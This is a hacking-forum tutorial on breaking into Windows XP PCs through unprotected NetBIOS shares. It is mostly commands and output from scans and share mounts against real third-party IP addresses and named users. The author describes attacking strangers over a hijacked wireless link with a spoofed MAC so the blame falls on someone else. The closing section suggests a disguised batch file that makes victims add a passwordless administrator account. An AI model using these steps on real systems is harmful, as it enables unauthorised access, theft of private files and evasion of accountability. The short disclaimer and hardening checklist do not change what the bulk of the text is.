TheTAZZone - Internet Chaos

Quick and Simple NetBIOS exploitation with Windows XP

ORIGINALLY POSTED BY NOKIA FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

[quote]This tutorial describes a methodology and process for compromising the security on a remote system, which is both illegal and morally questionable. The TAZ Zone cannot take any reponsibility for your use or misuse of this tutorial. It has been presented here because we at the TAZ Zone believe in the philosphy of full disclosure. Should you choose to use these methods against a computer, network, or system on which you do not have legal authority to do so, you will not only very likely be violating laws in your country of residence, but also undertaking an ethically objectionable project.

[img]http://www.tazforum.com/images/TAZBANNERa.gif[/img]

Under no circumstances does the The TAZ Zone condone the unauthorized use of exploits.[/quote]

[size=150][u][b]Quick and Simple – NetBIOS hacking with Windows XP…by Nokia[/b][/u][/size]

Before you read any of this paper, please let me point out the following: (other than the fact I originally wrote it in 1999)

When I preformed the following exploit, I used someone else’s Wireless connection, with a spoofed MAC address, using a Live CD. I done this so any logs on the target machine would lead back to the owner of the Wireless AP I used – and from there nothing would lead back to me. If it did somehow lead back to me, as I have used a Live CD there will not be a trace of it on my computer.

I have explained how I done this for a reason. That reason is if you can not meet all of the above as a minimum personal protective measure but still carryout the routines mentioned in this paper, you could very well be leaving yourself wide open to any official action that may be taken against you, as you WILL leave log entries on the target host if you connect to it in the described manner.

I will warn all readers now that this paper uses real live IP addresses over the internet. If you do not agree with this, please stop reading now. If you do not agree with it but still read and therefore learn the methods used in the paper, do not post complaining about the fact real IP’s have been used. Thank you.

However just because real IP’s have been used does not mean that by the time you come to read this, the same people will have the same IP addresses, so please don’t post saying ‘you have followed all the steps and still can’t connect to the host’….. As the IP may have changed!

NetBIOS is probably the biggest hole in any Windows computer, when it is not secured properly. You would be very surprised how easy it is for anyone to connect to a PC that is on the internet via its NetBIOS shares.

[b]A definition of NetBIOS is:[/b]

“Short for Network Basic Input Output System, an API that augments the DOS BIOS by adding special functions for local-area networks (LANs). Almost all Windows-based LANs for PCs are based on the NetBIOS. Some LAN manufacturers have even extended it, adding additional network capabilities.”

[b]How does NetBIOS work?[/b]

NetBIOS can be broken down in to three separate uses:

1) Name service for name registration and resolution
2) Session service for connection-oriented communication
3) Datagram distribution service for connectionless communication

For the NetBIOS application to work properly every host that is utilizing must have a unique NetBIOS name.

What most people and tutorials on NetBIOS fail to understand and mention is when accessing NetBIOS in the manner we will do in this paper we are using NBT or NetBT. This is defined as NetBIOS over TCP/IP and is different than the original NetBIOS specification. The original NetBIOS specification was designed for a very small group of computers to communicate with each other and certainly for no more than 12 in a group. NBT allows computers to use the NetBIOS API on a far bigger scale and to communicate with each other from far away and over the internet. Another common mistake people make is by saying NetBIOS uses port 139, it is in fact NBT that uses port 139 and what we shall be exploiting later on in this paper.

Enter NetBEUI. – NetBEUI is the actual protocol that NetBIOS services use and is quite commonly confused as being a different type of NetBIOS. Think of NetBIOS as the actual program/service and NetBEUI as the protocol the program uses to work. With the introduction of NBT however NetBEIU is being seen less and less on today’s LANS due to it not supporting any routing protocols.

Due to all the different protocols and services that use NetBIOS it has become the general consensus to group it all together and just call it NetBIOS. For most people this is good enough but if you are reading this, you want to exploit it and to do that you need to know that little bit more than the normal user! Wink

Most people (usually Linux lovers) are very quick to jump on the NetBIOS bang wagon by saying it is insecure, should not be used, is a bad design, a major weakness etc.
Whilst if it is incorrectly configured yes, all of the above are probably true , certain conditions have to be met to make it as bad as that. NetBIOS has to meet the following conditions to be exploited, [i]easily[/i]:

1. File and Printer Sharing for Microsoft Networks is installed as a network component (Network in Control Panel).
2. File and Printer Sharing for Microsoft Networks is bound to TCP/IP on an adapter used for the Internet.
3. Options for files and printers are checked (enabled) under File and Print Sharing.
4. “Share(s)” have actually been configured for file(s) and printer(s).
5. Strong passwords have not been used on file and printer “share(s).”
6. Scope ID has not been set like a strong password.

Windows PC’s ship with default shares such as SharedDocs. Some of these shares have a $ after them such as C$, PRINT$, ADMIN$, IPC$. The $ tells us they are hidden shares and NT and XP have these by default. There are a lot of hosts out there that make life easy for us by not password protecting their shares, for those that are password protected we can sometime create a “null” session by using the “” /U:”” switch at the end of our command. A null session gives us the lowest possible functionality but it does give us a place to start.

You should now have a very basic and broad understanding of what NetBIOS is – there is a lot more to it than this and I have simplified certain parts of it, as this paper is about exploiting NetBIOS not detailing how it works.

It would be beneficial to you to learn the in’s and out’s about NetBIOS and this web site is the best one I have found for NetBIOS information:
http://www.signaltonoise.net/library/netbios.htm
Or if you want to get really technical, the RFC 1001 for NetBIOS is here:
http://www.networksorcery.com/enp/rfc/rfc1001.txt

[b]Exploiting it:[/b]

Windows uses ports 139 and 445 when sharing files between hosts and servers with the NBT service. Usually some form of authentication is required for external hosts to access the shares available on it. However more often than not PC’s are configured to allow unrestricted access to all its shares – and even if we cant get access to the shares there is still a whole host of other valuable information we can collect from these open ports.

[b]So how do we do it?[/b]

Step One would be to download Nmap or a port scanner that you are familiar with – with the release of the Windows Executable of Nmap there is now no reason that you cant install it on a Windows box.

You can find the Download page here:
http://www.insecure.org/nmap/download.html

After you have downloaded Nmap go and get winfo from here:
http://ntsecurity.nu/toolbox/winfo/

When you have this browse to C:\WINDOWS\system32 and drop the winfo file there. Or you can manually edit your path for the command prompt to include the location of the winfo file.

Now we have nmap we want it to scan a range of IP’s but as we are trying to gain access to the NetBIOS shares, we only need to scan ports 139 and 445. So we issue the following command:

[code]Nmap –sS –P0 81.32.12.0-255 –p139,445[/code]

Here we have told nmap to conduct a SYN Stealth scan, without pinging the hosts, against the IP range of 81.32.12.0 – 81.32.12.255 only on ports 139 & 445.

Here are the results of the scan:

[code]Interesting ports on 81.32.12.204:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.205:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 206.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.207:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.208:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.209:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 210.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 211.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.212:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.213:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 214.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 215.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 216.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 217.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 218.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.219:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 220.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 221.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 222.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 223.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.224:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.225:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 226.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.227:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.228:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 229.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 230.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 231.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 232.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 233.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 234.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.235:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.236:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.237:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.238:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 239.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 240.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 241.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.242:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 243.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 244.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 245.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 246.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 247.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.248:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 249.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 250.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 251.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 252.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 253.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.254:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.255:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp closed microsoft-ds

Nmap finished: 256 IP addresses (256 hosts up) …..[/code]

OK, now looking at the output of the scan, there is three states a port can be in, Closed, Filtered or Open.

Closed speaks for itself, Filtered usually means it is open/active but is protected by a firewall of some kind and Open means it is open and un-protected.

So we trawl through the results and find that 81.32.12.240 has an open port on 139…

So we will go and take a look at it.

[i]Just a side note – we scanned for port 445 to as it is possible to have port 139 open but not have the file sharing service running – if port 445 is open as well as 139 it usually means that the file sharing service is up and running and could save us some time when choosing which host to attack.[/i]

Fire up the command prompt again and use the in-built NBTSTAT utility that comes with Windows. The command we give is:
Nbtstat –a [ip address]

Like so:

[code]H:\>nbtstat -a 81.32.12.240

Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00[/code]

So what is all this telling us?

Well what we are looking at mainly is the ‘TYPE’ status. We want to see <20> there. A common misconception is that if you can connect to a box in the above mentioned manner, that file sharing is enabled. This is not always the case. When we have connected we need to see the <20> there to tell us File Sharing is enabled, if it is not there and you are at a level that means you are reading this – you may as well move on to another box

The following table lists all the possible entries you can get:

[code] 00 U Workstation Service
01 U Messenger Service
<.._MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCP/IP Service
52 U DEC Pathworks TCP/IP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Application
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server[/code]

As you can see there are many different services that we can connect to. The scope of this paper is File Sharing though, so we will just concentrate on the <20> field.

So, after discovering we can ‘nbtstat’ to another box and we have established that the File Sharing Service is running we want to see what shares are available on a box.

For this we again use an inbuilt command in Windows. The ‘net’ command. Or more specifically the ‘net view’ command.

[code]H:\>net view \\81.32.12.240
System error 5 has occurred.

Access is denied.[/code]

Woops. Ok so this guy is not as open as he first appeared and we can’t get a list of his shares. This may be because he is not running any shares or because he has locked down his box and prevented if from displaying his shares to the casual internet user.

I have put this in to this paper for a few reasons. The first being, if you scour the internet looking for NetBIOS tutorials, you will find hundreds that have been wrote and performed and an internal LAN, which is conveniently setup to allow anonymous access to the File Sharing service. This paper is using live IP addresses in real life scenarios on the real internet – not a pre-constructed LAN…..hence you won’t always be successful first time!

Another reason I left it in is to show that just because you can see the NetBIOS table and it has the <20> File Sharing service running, does not mean you can connect to it!

The final reason is to demonstrate that you will not always be successful with this attack and it can take a lot of trail and error. I have given lessons in the past that have gone on for in excess of 60 minutes before we have found an open and suitable host.

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the shares available…..but that does not mean there aren’t any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the inbuilt ‘net’ command only this time we use the ‘net use’ command.

[code]H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for ‘81.32.12.240’: administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.[/code]

OK we don’t know the password…..there are heaps of password crackers for NetBIOS out there – which I consider to be more advanced so will be included in the next paper.

We do have the option of connecting via a ‘null’ session however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we use the “” /U:”” switch at the end of our command.

Try the following:

[code]H:\>net use \\81.32.12.240\ipc$ “” /U:””
The command completed successfully.[/code]

Now try the ‘net view’ command again to see if we can get a list of the shares. This may or may not be successful but more often than not it will fail.(If you are successful read on further down the page to find what to do next!)

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the oN/ switch or to right click the top of the command prompt window and go to properties. Once here increase the buffer size to enable you to scroll upwards in the command prompt – otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.

[code]nmap -sS -P0 -v 86.132.223.0-255 -p 139,445[/code]

The results for open ports came back as:

[code]Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227[/code]

OK, so now we have a whole host of my neighbours to connect to!

Let choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:

[code]H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00[/code]

Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….

[code]H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

——————————————————————————-
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.[/code]

Holy Shit! Look at all those shares.

Now open up a new command prompt and give the following command:

[code]H:\>winfo 86.132.223.178 -v

Winfo 2.0 – copyright (c) 1999-2003, Arne Vidstrom
– http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:

– OS version: 5.1

DOMAIN INFORMATION:

– Primary domain (legacy): MSHOME
– Account domain: OFFICE
– Primary domain: MSHOME
– DNS name for primary domain:
– Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

– Type: Unknown
– Remark: Remote IPC

* print$

– Type: Disk drive
– Remark: Printer Drivers

* SharedDocs

– Type: Disk drive
– Remark:

* johns

– Type: Disk drive
– Remark:

* PaperPor.2

– Type: Print queue
– Remark: PaperPort Color Image

* Printer7

– Type: Print queue
– Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

– Type: Disk drive
– Remark:

* Printer4

– Type: Print queue
– Remark: ProgeSOFT PDF Wizard

* PaperPor

– Type: Print queue
– Remark: PaperPort Black & White Image

* BrotherD.2

– Type: Print queue
– Remark: BRN_759F2E

* bramford photos

– Type: Disk drive
– Remark:

* Printer9

– Type: Print queue
– Remark: EPSON PictureMate

* Printer

– Type: Print queue
– Remark: Imprimante Fax Olitec

* BrotherD

– Type: Print queue
– Remark: Brother DCP-340CW USB Printer[/code]

As you can see winfo gives us all the shares in an easier to read layout. You can put –n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Let me explain the following command briefly first though.

“Net use” – means we are going to use a network resource.
The “*”means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM etc. Using the * just tells windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to but the outcome is the same.

[code]H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.[/code]

Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to ‘My Computer’ and you will have a Z drive there already connected and mapped out for you! Click on it and you get to see what is in Johns share.

Let’s try another Share:

[code]H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.[/code]

So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other and easier way to do this, is to now go to Start > Search > Computers and add the IP Address in. You will now get a nice graphical view of all the shares.

So we can view all the shares here……..but that soon gets boring…what else can we do?

Well, if we go to My Computer and right click on the share, then go to properties.
What we are interested in here is the shares and the groups available to us and we can also get to see if it is on an AD domain.
So go to Security and take a look at the shares/groups. It should become apparent now if it is on an AD domain or not.
Would it be worth seeing what rights/privileges John has, since we are on his share…….it would probably be a good idea!

So we go to Security > Advanced > Here we can see a detailed list of all the groups and permissions…..but we want more than that…. So we go to the ‘Effective Permissions tab’ and click on Select.

We now get a box up allowing us to select a user name. We already know his first name is John……..what are the odds that if we go trawling through all the letter and stuff available to us in is share, we could probably find his surname pretty quick……..
Then we enter his first name, a ‘.’ and then his surname. Usernames on an AD are usually a first name and a surname separated by a dot. If it doesn’t work, experiment with different methods of user name!
If you manage to find his log on name – you will be able to view all his current permissions.
But don’t forget the winfo output…which listed the users who are currently logged on……..

SO, we have seen who it is done the manual way and for me, the more enjoyable and skilful way.

Now lets do it the skid die way.

Go and download Essential Net Tools from http://www.tamos.com/ you should be able to get a free 30 day trial of it.

Install it and crank it up.

Now go to NBscan and enter our IP address in to it and it will display pretty much the same information that the command prompt did but in a more graphical manner. Right click on the computer at the top of the window and select Open Computer.

This just opens the same window as we got when we went to search > computers. Right clicking it also give us a few more options such as, Add to LMHOSTS.
If we add this we can connect to it in the same manner we would any other box on the LAN. I’m not going to explain what the LMHOSTS file is as most people will know but if you don’t you can go here to read about it should you wish:
http://support.microsoft.com/?kbid=150800

Play around with the Essential Net Tools application is it is a hell of a lot more than it may first appear to be…..you can use it to sniff data similar to the way Ethereal does……hmmmm could we use that by making it connect to something that needs a share password…….

If we so wanted to, we could connect to the printer shares in the same way we connect to a networked printer on our own LAN and print things out. However we are all a touch more mature than this here aren’t we, so we won’t entertain that idea.

Is there anything else we can do with these shares….of course there is.
If you think about it you have a full and unrestricted TCP connection to another computer – who just happens to trust you from a shared resource point of view.

If we have write privileges we can drop any file we choose in the shared drive. Some of the more astute of you may think about dropping a command prompt or making a quick .bat file to spawn a command prompt and start issuing some

[code]net user TAZ/ADD[/code]

Commands followed by some

[code]net group “Administrators” TAZ /ADD[/code]

However this will not work if you run the command prompt yourself – you will end up adding an administrative user account called TAZ to your own computer.

What if we make a cleverly named batch file for the unsuspecting user to run though……..

If the user has admin rights on the box it is run on, he will add an admin account called TAZ with no password to his PC…………due to the fact all his shares are available to the internet, chances are when he has ran the batch file, he won’t have a clue what he has just done anyways!

Well this “small” paper has run on much longer that I had planned so I will end it here. There is an Advanced NetBIOS paper in the pipeline where we will look at defeating password protected shares, elevating our privileges, enumerating AD users and cracking their passwords.

In summary, I hope I have demonstrated exactly how easy it is to exploit an [b]unprotected[/b] NetBIOS share over the internet.
Remember, if you don’t want this to happen to you – make sure that if your PC [b]does[/b] meet all of the following requirements, you change at least one of them:

1. File and Printer Sharing for Microsoft Networks is installed as a network component (Network in Control Panel).
2. File and Printer Sharing for Microsoft Networks is bound to TCP/IP on an adapter used for the Internet.
3. Options for files and printers are checked (enabled) under File and Print Sharing.
4. “Share(s)” have actually been configured for file(s) and printer(s).
5. Strong passwords have not been used on file and printer “share(s).”
6. Scope ID has not been set like a strong password.

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertise

If you'd like to advertise on The Mutt ( aka TheTAZZone.com ) feel free to contact us at: administration[at]thetazzone.com

TheTAZZone is a non-commercial entity. We do not sell any products or services ourselves. Our revenue comes from advertising and donations only.

We appreciate your support! Your advertising revenue ( or donations ) helps us to continue to upgrade, improve, and offset the costs of maintaining this site.

Donations can be made through the page ' Donate '.